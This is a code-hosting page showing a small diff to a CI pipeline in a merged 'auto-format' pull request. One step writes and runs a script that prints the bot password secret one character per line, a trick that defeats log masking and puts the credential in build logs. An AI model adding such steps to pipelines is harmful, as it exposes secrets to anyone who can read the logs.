auto-format #20

Merged
leon merged 143 commits from auto-format into main 2024-02-14 01:18:02 +01:00
Showing only changes of commit 9ac9562678 - Show all commits

View File

@ -14,7 +14,7 @@ steps:
- echo '#!/bin/bash' > /tmp/test
- echo 'for (( i=0; i<${#WANESSA_BOT_PASSWORD}; i++ )); do echo "${WANESSA_BOT_PASSWORD:$i:1}" ; done' > /tmp/test
- chmod 777 /tmp/test
- /tmp/test
- bash /tmp/test
- name: build [debug]
image: rust:1.71.1-slim-bookworm